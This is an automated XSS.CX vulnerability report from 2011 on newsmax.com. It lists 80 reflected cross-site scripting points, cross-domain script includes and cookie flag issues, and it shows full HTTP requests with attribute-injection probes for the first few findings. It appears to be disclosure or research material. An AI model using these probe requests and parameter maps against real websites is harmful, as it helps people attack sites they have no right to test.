XSS, newsmax.com, Cross Site Scripting, DORK, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Mar 19 09:35:52 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. Cross-site scripting (reflected)

1.1. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 2]

1.2. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 3]

1.3. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 4]

1.4. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 5]

1.5. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 7]

1.6. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 7]

1.7. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]

1.8. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [name of an arbitrarily supplied request parameter]

1.9. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 2]

1.10. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 3]

1.11. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 4]

1.12. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 5]

1.13. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 7]

1.14. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [REST URL parameter 7]

1.15. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]

1.16. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]

1.17. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 2]

1.18. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 3]

1.19. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 4]

1.20. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 5]

1.21. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 7]

1.22. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [REST URL parameter 7]

1.23. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]

1.24. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]

1.25. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 2]

1.26. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 3]

1.27. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 4]

1.28. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 5]

1.29. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 7]

1.30. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [REST URL parameter 7]

1.31. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]

1.32. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917 [name of an arbitrarily supplied request parameter]

1.33. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 2]

1.34. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 3]

1.35. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 4]

1.36. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 5]

1.37. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 7]

1.38. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [REST URL parameter 7]

1.39. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]

1.40. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844 [name of an arbitrarily supplied request parameter]

1.41. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 2]

1.42. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 3]

1.43. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 4]

1.44. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 5]

1.45. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 7]

1.46. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [REST URL parameter 7]

1.47. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]

1.48. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922 [name of an arbitrarily supplied request parameter]

1.49. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 2]

1.50. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 3]

1.51. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 4]

1.52. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 5]

1.53. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 7]

1.54. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [REST URL parameter 7]

1.55. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]

1.56. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695 [name of an arbitrarily supplied request parameter]

1.57. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 2]

1.58. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 3]

1.59. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 4]

1.60. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 5]

1.61. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 7]

1.62. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [REST URL parameter 7]

1.63. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]

1.64. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851 [name of an arbitrarily supplied request parameter]

1.65. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 2]

1.66. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 3]

1.67. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 4]

1.68. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 5]

1.69. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 7]

1.70. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [REST URL parameter 7]

1.71. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]

1.72. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964 [name of an arbitrarily supplied request parameter]

1.73. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 2]

1.74. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 3]

1.75. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 4]

1.76. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 5]

1.77. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 7]

1.78. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [REST URL parameter 7]

1.79. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]

1.80. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920 [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://www.newsmax.com/

2.2. http://www.newsmax.com/FastFeatures

2.3. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

2.4. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

2.5. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

2.6. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

2.7. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

2.8. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

2.9. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

2.10. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

2.11. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

2.12. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

2.13. http://www.newsmax.com/Headline/franklin-graham-christians-muslims/2011/03/18/id/389992

2.14. http://www.newsmax.com/Home

2.15. http://www.newsmax.com/HotTopics

2.16. http://www.newsmax.com/InsideCover/63SenatorsUrgeObamatoLeadonDebt/2011/03/18/id/389975

2.17. http://www.newsmax.com/InsideCover/Books-ValeriePlameWilson/2011/03/19/id/390010

2.18. http://www.newsmax.com/InsideCover/Gingrich-Obama-Spectator-in-Chief/2011/03/18/id/389898

2.19. http://www.newsmax.com/InsideCover/Giuliani-NH/2011/03/19/id/390014

2.20. http://www.newsmax.com/InsideCover/HiddenCameraActivist/2011/03/18/id/389987

2.21. http://www.newsmax.com/InsideCover/MurkowskiJapanChernobyl/2011/03/18/id/389981

2.22. http://www.newsmax.com/InsideCover/Obama-High-SpeedRail/2011/03/19/id/390017

2.23. http://www.newsmax.com/InsideCover/Republicans/2011/03/19/id/390003

2.24. http://www.newsmax.com/InsideCover/UN-UN-US-Human/2011/03/18/id/389988

2.25. http://www.newsmax.com/InsideCover/WisconsinBudget-E-Mails/2011/03/18/id/389990

2.26. http://www.newsmax.com/InsideCover/allen-west-obama-military/2011/03/18/id/389991

2.27. http://www.newsmax.com/InsideCover/dick-morris-times-bestseller/2011/03/18/id/389995

2.28. http://www.newsmax.com/InsideCover/franklin-graham-japan-tsunami/2011/03/18/id/389996

2.29. http://www.newsmax.com/InsideCover/helen-thomas-jews-white/2011/03/18/id/390000

2.30. http://www.newsmax.com/InsideCover/newsmax-dickmorris-mikehuckabee-newyorktimes/2011/03/18/id/389967

2.31. http://www.newsmax.com/InsideCover/scott-walker-gop-republican/2011/03/18/id/389994

2.32. http://www.newsmax.com/Newsfront/AF-Libya/2011/03/19/id/390002

2.33. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390009

2.34. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390011

2.35. http://www.newsmax.com/Newsfront/AS-Japan-Earthquake/2011/03/19/id/390015

2.36. http://www.newsmax.com/Newsfront/Japan-TravelWarning/2011/03/19/id/390013

2.37. http://www.newsmax.com/Newsfront/Libya-Diplomacy/2011/03/19/id/390019

2.38. http://www.newsmax.com/Newsfront/Libya-Diplomacy/2011/03/19/id/390020

2.39. http://www.newsmax.com/Newsfront/Obama-LatinAmerica/2011/03/19/id/390001

2.40. http://www.newsmax.com/Newsfront/Obit-WarrenChristopher/2011/03/19/id/390006

2.41. http://www.newsmax.com/Newsfront/UN-Japan-Earthquake/2011/03/18/id/389909

2.42. http://www.newsmax.com/Newsfront/UN-Japan-Earthquake/2011/03/19/id/390005

2.43. http://www.newsmax.com/Politics/BernieSanders-Obama-challenger-liberal/2011/03/18/id/389989

2.44. http://www.newsmax.com/Politics/Democrats-Budget-Issues/2011/03/18/id/389934

2.45. http://www.newsmax.com/Politics/HouseMembersMoveAgainstChildPorn/2011/03/18/id/389932

2.46. http://www.newsmax.com/Politics/Huckabee-Nelson-Florida-Senate/2011/03/18/id/389971

2.47. http://www.newsmax.com/Politics/RepublicanstoFocusonBudgetCuts-JobsLink/2011/03/18/id/389946

2.48. http://www.newsmax.com/Politics/TwoPartiesinMajorShowdownonBudget/2011/03/18/id/389923

2.49. http://www.newsmax.com/Politics/nancypelosi-capitolhill-democrats-obama/2011/03/17/id/389836

2.50. http://www.newsmax.com/Politics/pelosi-democrats-obamacare/2011/03/18/id/389963

2.51. http://www.newsmax.com/PrivacyStatement

2.52. http://www.newsmax.com/SciTech/ML-Iran-Space/2011/03/17/id/389737

2.53. http://www.newsmax.com/SciTech/US-Books-E-Sales/2011/03/18/id/389868

2.54. http://www.newsmax.com/SciTech/USDronetoInspectJapansQuake-CrippledNuclearPlant/2011/03/17/id/389742

2.55. http://www.newsmax.com/ScienceTechnology

2.56. http://www.newsmax.com/Slideshows

2.57. http://www.newsmax.com/TermsConditions

2.58. http://www.newsmax.com/US/CalifCityWorker-Suicide/2011/03/19/id/390004

2.59. http://www.newsmax.com/US/CaliforniaStorm/2011/03/19/id/390007

2.60. http://www.newsmax.com/US/Gender-NeutralBible/2011/03/17/id/389853

2.61. http://www.newsmax.com/US/Hit-and-RunFamily/2011/03/19/id/390016

2.62. http://www.newsmax.com/US/IGDoDOverpaidJetFuelContractsby200M/2011/03/18/id/389942

2.63. http://www.newsmax.com/US/NationalChristmasTree/2011/03/19/id/390018

2.64. http://www.newsmax.com/US/PollAmericansMoreWorriedaboutEconomy/2011/03/18/id/389938

2.65. http://www.newsmax.com/US/UCLAStudent-AsianRant/2011/03/19/id/390012

2.66. http://www.newsmax.com/US/US-Russia/2011/03/19/id/390008

2.67. http://www.newsmax.com/advertise

2.68. http://www.newsmax.com/archives

2.69. http://www.newsmax.com/blogs

2.70. http://www.newsmax.com/blogs/

2.71. http://www.newsmax.com/blogs/AndreaTantaros/id-35

2.72. http://www.newsmax.com/blogs/Estrich/id-38

2.73. http://www.newsmax.com/blogs/JackieGingrich/id-96

2.74. http://www.newsmax.com/blogs/JohnBerlau/id-65

2.75. http://www.newsmax.com/blogs/KenTimmerman/id-90

2.76. http://www.newsmax.com/blogs/LannyDavis/id-43

2.77. http://www.newsmax.com/blogs/Limbaugh/id-36

2.78. http://www.newsmax.com/blogs/Miller/id-117

2.79. http://www.newsmax.com/blogs/Murdock/id-108

2.80. http://www.newsmax.com/blogs/RonaldKessler/id-69

2.81. http://www.newsmax.com/blogs/deBorchgrave/id-80

2.82. http://www.newsmax.com/contact

2.83. http://www.newsmax.com/default.aspx

2.84. http://www.newsmax.com/hottopics/topic/2012-President-Race/116

2.85. http://www.newsmax.com/hottopics/topic/Airport-Security/132

2.86. http://www.newsmax.com/hottopics/topic/Barack-Obama/67

2.87. http://www.newsmax.com/hottopics/topic/Donald-Trump/138

2.88. http://www.newsmax.com/hottopics/topic/Egypt-Unrest/136

2.89. http://www.newsmax.com/hottopics/topic/Exclusive-Interviews/69

2.90. http://www.newsmax.com/hottopics/topic/Healthcare-Reform/103

2.91. http://www.newsmax.com/hottopics/topic/Middle-East/82

2.92. http://www.newsmax.com/hottopics/topic/Obama-Budget/137

2.93. http://www.newsmax.com/hottopics/topic/Public-Union/139

2.94. http://www.newsmax.com/hottopics/topic/Tea-Party/111

2.95. http://www.newsmax.com/hottopics/topic/WikiLeaks/133

2.96. http://www.newsmax.com/insidecover

2.97. http://www.newsmax.com/jokes/

2.98. http://www.newsmax.com/mainpop.htm

2.99. http://www.newsmax.com/newsfront

2.100. http://www.newsmax.com/politics

2.101. http://www.newsmax.com/rss

2.102. http://www.newsmax.com/thewire

2.103. http://www.newsmax.com/us

2.104. http://www.newsmax.com/video

2.105. http://www.newsmax.com/washington-times/

3. Cookie without HttpOnly flag set

4. Email addresses disclosed

4.1. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

4.2. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701

4.3. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912

4.4. http://www.newsmax.com/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/389917

4.5. http://www.newsmax.com/FastFeatures/Stock-trading-workshop-tips/2011/03/17/id/371844

4.6. http://www.newsmax.com/FastFeatures/attentiondeficitdisorder-attentiondeficithyperactivity-attentiondeficithyperactivitydisorder-attentiondeficitsymptoms/2011/03/18/id/389922

4.7. http://www.newsmax.com/FastFeatures/diet-tips-for-athletes/2011/03/17/id/371695

4.8. http://www.newsmax.com/FastFeatures/signsofVitaminB5signsanddeficiencyofVitaminB5deficiencyofVitaminB5deficiencyandsignofVitaminB5/2011/03/17/id/389851

4.9. http://www.newsmax.com/FastFeatures/supermoon-Japanese-tsunami-earthquake/2011/03/18/id/389964

4.10. http://www.newsmax.com/FastFeatures/supermoon-largest-moon-saturday/2011/03/18/id/389920

4.11. http://www.newsmax.com/PrivacyStatement

4.12. http://www.newsmax.com/TermsConditions

4.13. http://www.newsmax.com/advertise

4.14. http://www.newsmax.com/contact

5. HTML does not specify charset

6. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 80 instances of this issue:


1.1. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f0ec'%20a%3db%200d25f46eeae was submitted in the REST URL parameter 2. This input was echoed as 7f0ec' a=b 0d25f46eeae in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec'%20a%3db%200d25f46eeae/2011/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin7f0ec' a=b 0d25f46eeae/2011/03/18/id/389924'
class="article_tools_link">
...[SNIP]...

1.2. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93755'%20a%3db%20af3bda33851 was submitted in the REST URL parameter 3. This input was echoed as 93755' a=b af3bda33851 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755'%20a%3db%20af3bda33851/03/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache,private, no-store, must-revalidate
Content-Length: 45921
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
Date: Sat, 19 Mar 2011 14:13:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   Condi
...[SNIP]...
<a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/201193755' a=b af3bda33851/03/18/id/389924'
class="article_tools_link">
...[SNIP]...

1.3. http://www.newsmax.com/FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsmax.com
Path:   /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/03/18/id/389924

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25499'%20a%3db%2013dbdb043e was submitted in the REST URL parameter 4. This input was echoed as 25499' a=b 13dbdb043e in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /FastFeatures/AloeVerabenefits-AloeVerauses-AloeVeraforhair-AloeVeraforskin/2011/0325499'%20a%3db%2013dbdb043e/18/id/389924 HTTP/1.1
Host: www.newsmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
